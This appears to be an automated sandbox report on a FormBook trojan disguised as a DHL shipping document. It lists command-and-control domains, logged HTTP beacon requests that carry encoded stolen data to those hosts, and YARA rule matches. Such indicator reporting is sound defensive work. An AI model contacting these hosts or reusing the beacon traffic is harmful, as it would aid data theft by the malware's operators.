Source: help.exe, 00000005.00000002.582591092.00000000036E8000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://motherhoodinthegarden.com/d2a3/?Mw=cN5AEPknHvfgRR2crmYFAZMRCOFajc7CFMghZAmOXZ6v62v
Source: DHL_SHIPPING_DOCUMENT.exe String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: help.exe, 00000005.00000002.582591092.0000000003D30000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://perldancer.org/
Source: explorer.exe, 00000004.00000003.557927500.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.451404045.0000000005A2E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.585709062.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.363ww.top
Source: explorer.exe, 00000004.00000002.585709062.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.363ww.top/d2a3/
Source: explorer.exe, 00000004.00000003.557927500.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.451404045.0000000005A2E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.585709062.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.363ww.topwww.rw-bau.comF7L99l=8qpwJ
Source: explorer.exe, 00000004.00000003.557927500.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.451404045.0000000005A2E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.585709062.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.afzalhossainantor.com
Source: explorer.exe, 00000004.00000002.585709062.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.afzalhossainantor.com/d2a3/
Source: explorer.exe, 00000004.00000003.557927500.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.451404045.0000000005A2E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.585709062.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.afzalhossainantor.comwww.staatslieden.bizF7L99l=8qpwJ
Source: explorer.exe, 00000004.00000003.557927500.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.451404045.0000000005A2E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.585709062.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.espisys-technology.com
Source: explorer.exe, 00000004.00000002.585709062.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.espisys-technology.com/d2a3/
Source: explorer.exe, 00000004.00000003.451404045.0000000005A2E000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.espisys-technology.comwww.on-smooth.comF7L99l=8qpwJ)
Source: explorer.exe, 00000004.00000003.557927500.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.451404045.0000000005A2E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.585709062.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.fresnocap.com
Source: explorer.exe, 00000004.00000002.585709062.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.fresnocap.com/d2a3/
Source: explorer.exe, 00000004.00000003.557927500.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.451404045.0000000005A2E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.585709062.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.fresnocap.comwww.vanguardfsm.comF7L99l=8qpwJ
Source: explorer.exe, 00000004.00000003.557927500.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.451404045.0000000005A2E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.585709062.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.getpay.life
Source: explorer.exe, 00000004.00000002.585709062.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.getpay.life/d2a3/
Source: explorer.exe, 00000004.00000003.557927500.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.451404045.0000000005A2E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.585709062.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.luxgudonu.store
Source: explorer.exe, 00000004.00000002.585709062.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.luxgudonu.store/d2a3/
Source: explorer.exe, 00000004.00000003.451404045.0000000005A2E000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.luxgudonu.storewww.sowmedia.siteF7L99l=8qpwJ
Source: explorer.exe, 00000004.00000003.557927500.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.451404045.0000000005A2E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.585709062.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.motherhoodinthegarden.com
Source: explorer.exe, 00000004.00000002.585709062.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.motherhoodinthegarden.com/d2a3/
Source: explorer.exe, 00000004.00000003.557927500.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.451404045.0000000005A2E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.585709062.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.on-smooth.com
Source: explorer.exe, 00000004.00000002.585709062.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.on-smooth.com/d2a3/
Source: explorer.exe, 00000004.00000003.451404045.0000000005A2E000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.on-smooth.comwww.luxgudonu.storeF7L99l=8qpwJ
Source: explorer.exe, 00000004.00000003.557927500.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.451404045.0000000005A2E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.585709062.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.rw-bau.com
Source: explorer.exe, 00000004.00000002.585709062.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.rw-bau.com/d2a3/
Source: explorer.exe, 00000004.00000003.557927500.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.451404045.0000000005A2E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.585709062.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.rw-bau.comwww.worldhortihealth.comF7L99l=8qpwJ
Source: explorer.exe, 00000004.00000003.557927500.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.451404045.0000000005A2E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.585709062.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.sowmedia.site
Source: explorer.exe, 00000004.00000002.585709062.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.sowmedia.site/d2a3/
Source: explorer.exe, 00000004.00000003.451404045.0000000005A2E000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.sowmedia.sitewww.yh78898.comF7L99l=8qpwJ
Source: explorer.exe, 00000004.00000003.557927500.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.451404045.0000000005A2E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.585709062.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.staatslieden.biz
Source: explorer.exe, 00000004.00000002.585709062.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.staatslieden.biz/d2a3/
Source: explorer.exe, 00000004.00000003.557927500.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.451404045.0000000005A2E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.585709062.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.staatslieden.bizwww.fresnocap.comF7L99l=8qpwJ
Source: explorer.exe, 00000004.00000003.557927500.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.451404045.0000000005A2E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.585709062.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.vanguardfsm.com
Source: explorer.exe, 00000004.00000002.585709062.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.vanguardfsm.com/d2a3/
Source: explorer.exe, 00000004.00000003.557927500.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.451404045.0000000005A2E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.585709062.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.vanguardfsm.comwww.xefordbienhoa.comF7L99l=8qpwJr
Source: explorer.exe, 00000004.00000003.557927500.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.451404045.0000000005A2E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.585709062.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.versicherungsgott.com
Source: explorer.exe, 00000004.00000002.585709062.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.versicherungsgott.com/d2a3/
Source: explorer.exe, 00000004.00000003.557927500.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.451404045.0000000005A2E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.585709062.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.worldhortihealth.com
Source: explorer.exe, 00000004.00000002.585709062.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.worldhortihealth.com/d2a3/
Source: explorer.exe, 00000004.00000003.557927500.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.451404045.0000000005A2E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.585709062.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.worldhortihealth.comwww.afzalhossainantor.comF7L99l=8qpwJ
Source: explorer.exe, 00000004.00000003.557927500.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.451404045.0000000005A2E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.585709062.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.xefordbienhoa.com
Source: explorer.exe, 00000004.00000002.585709062.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.xefordbienhoa.com/d2a3/
Source: explorer.exe, 00000004.00000003.557927500.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.451404045.0000000005A2E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.585709062.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.yh78898.com
Source: explorer.exe, 00000004.00000002.585709062.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.yh78898.com/d2a3/
Source: explorer.exe, 00000004.00000003.451404045.0000000005A2E000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.yh78898.comwww.363ww.topF7L99l=8qpwJ
Source: 35-7052c.5.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: 35-7052c.5.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: 35-7052c.5.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: help.exe, 00000005.00000003.398334454.000000000069B000.00000004.00000020.00020000.00000000.sdmp, 35-7052c.5.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 35-7052c.5.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: help.exe, 00000005.00000003.398334454.000000000069B000.00000004.00000020.00020000.00000000.sdmp, 35-7052c.5.dr String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: help.exe, 00000005.00000003.398334454.000000000069B000.00000004.00000020.00020000.00000000.sdmp, 35-7052c.5.dr String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
Source: help.exe, 00000005.00000003.398334454.000000000069B000.00000004.00000020.00020000.00000000.sdmp, 35-7052c.5.dr String found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
Source: help.exe, 00000005.00000003.398334454.000000000069B000.00000004.00000020.00020000.00000000.sdmp, 35-7052c.5.dr String found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
Source: help.exe, 00000005.00000003.398334454.000000000069B000.00000004.00000020.00020000.00000000.sdmp, 35-7052c.5.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: unknown HTTP traffic detected: POST /d2a3/ HTTP/1.1Host: www.motherhoodinthegarden.comConnection: closeContent-Length: 184Cache-Control: no-cacheOrigin: http://www.motherhoodinthegarden.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.motherhoodinthegarden.com/d2a3/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 4d 77 3d 52 50 52 67 48 34 38 6e 43 63 44 72 51 57 37 78 32 56 34 7a 42 72 67 44 64 38 49 50 6e 38 76 6f 64 73 6f 58 51 78 4b 31 59 4b 66 4d 35 7a 6e 72 59 4d 78 73 76 48 33 4d 57 79 7a 71 4f 73 38 68 53 6c 50 6b 43 37 73 48 61 6c 33 64 52 4a 61 49 55 74 48 45 77 42 30 64 45 57 55 47 65 6f 4a 4e 45 31 6e 4e 54 76 37 4c 76 51 4d 56 4e 5f 61 4c 49 47 62 36 39 54 61 42 67 30 39 53 57 70 77 6a 63 39 73 53 78 69 4e 63 75 5a 67 70 66 58 6f 4e 74 75 34 38 6b 37 52 6f 46 4b 7a 32 6d 63 36 72 59 4f 68 6c 31 76 75 6c 69 48 75 4b 41 73 35 69 34 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: Mw=RPRgH48nCcDrQW7x2V4zBrgDd8IPn8vodsoXQxK1YKfM5znrYMxsvH3MWyzqOs8hSlPkC7sHal3dRJaIUtHEwB0dEWUGeoJNE1nNTv7LvQMVN_aLIGb69TaBg09SWpwjc9sSxiNcuZgpfXoNtu48k7RoFKz2mc6rYOhl1vuliHuKAs5i4g).
Source: unknown DNS traffic detected: queries for: www.versicherungsgott.com
Source: global traffic HTTP traffic detected: GET /d2a3/?F7L99l=8qpwJ&Mw=3fW4twhu5IX2LSkBcFVlWjxiVco4zHJfqjvATlwHU7q8puaymE5DWsW8adrpP96Z6UNtMOOwQnTRLGoNrAuApIzT11t8CH71vQ== HTTP/1.1Host: www.versicherungsgott.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /d2a3/?Mw=cN5AEPknHvfgRR2crmYFAZMRCOFajc7CFMghZAmOXZ6v62v+A/wOpED6FQaDJ/tGFUb6Y91ZfjLOaofoM8qmjHtlEGMmc9VxCg==&F7L99l=8qpwJ HTTP/1.1Host: www.motherhoodinthegarden.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /d2a3/?F7L99l=8qpwJ&Mw=VQWJd0zbMmoZh8qz35kMD56sFoyc6gTYso/MZ3BJ/Q0NuTQy4/HeuFqYJgzXZamkeMaLAEsOyVyJpFsiRVW3jp2QSfHijAqmyw== HTTP/1.1Host: www.getpay.lifeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /d2a3/?Mw=HRt8t1hC6ylxzqu69JiO+2+wCg/IpDjUJ4ODvXLX3JGoHCx8OnZPShMSZXcaT/6Kc192JGOxG+z3HQLrZrJeLIMi1PhqwEBrHA==&F7L99l=8qpwJ HTTP/1.1Host: www.espisys-technology.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /d2a3/?F7L99l=8qpwJ&Mw=LnB6L7dnOzftoEr5UpUEPAqnd7gAmYo0E1h8Hr8XDrTV/RCVTRWGXzxgMAjKYD2ZiMi0DXBclY2V/N6w7Ub5K9/YRO3kcEW/Xg== HTTP/1.1Host: www.on-smooth.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /d2a3/?Mw=OjO/noXVMTk40sLqqWNUhETz5fwNQfL3iZv4zuTHX4FsBRg0F7vbWW3nqcxNlOGl4ZCA660VFsqTMG20zBTe2NhxC9mrQabZ6Q==&F7L99l=8qpwJ HTTP/1.1Host: www.luxgudonu.storeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /d2a3/?F7L99l=8qpwJ&Mw=lIoejRloD0NPrvtjG56SffHGubt9bC7l7VozaPHGZoJbvkCik3wIcy97/aKLKqf+leC/SNQQ4bUyJkgTGWAXDnv4xxMA9hLjSw== HTTP/1.1Host: www.sowmedia.siteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /d2a3/?Mw=/rn7tSorYChcOKKpyJYvjsebDE1EetOtUlfXV6ATVt8jMTNnk8PtnAR6Iam3VdBxJXQPah1uBiYgzGnhkXQp6MgBOVaGh7iMCA==&F7L99l=8qpwJ HTTP/1.1Host: www.yh78898.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Contains functionality for read data from the clipboard
Source: C:\Users\user\Desktop\DHL_SHIPPING_DOCUMENT.exe Code function: 0_2_00405809 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard, 0_2_00405809

E-Banking Fraud
barindex
Yara detected FormBook
Source: Yara match File source: 3.2.eixfhzlwqd.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.eixfhzlwqd.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.581265823.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.357493625.0000000000900000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.581153913.0000000002900000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.357465550.00000000008D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.357347266.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.579126869.0000000000510000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 3.2.eixfhzlwqd.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 3.2.eixfhzlwqd.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.2.eixfhzlwqd.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 3.2.eixfhzlwqd.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.581265823.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.581265823.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.357493625.0000000000900000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.357493625.0000000000900000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.581153913.0000000002900000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.581153913.0000000002900000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.357465550.00000000008D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.357465550.00000000008D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.357347266.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.357347266.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.579126869.0000000000510000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.579126869.0000000000510000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Initial sample is a PE file and has a suspicious name
Source: initial sample Static PE information: Filename: DHL_SHIPPING_DOCUMENT.exe
Uses 32bit PE files
Source: DHL_SHIPPING_DOCUMENT.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Yara signature match
Source: 3.2.eixfhzlwqd.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 3.2.eixfhzlwqd.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.2.eixfhzlwqd.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 3.2.eixfhzlwqd.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.581265823.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.581265823.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.357493625.0000000000900000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.357493625.0000000000900000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.581153913.0000000002900000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.581153913.0000000002900000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.357465550.00000000008D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.357465550.00000000008D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
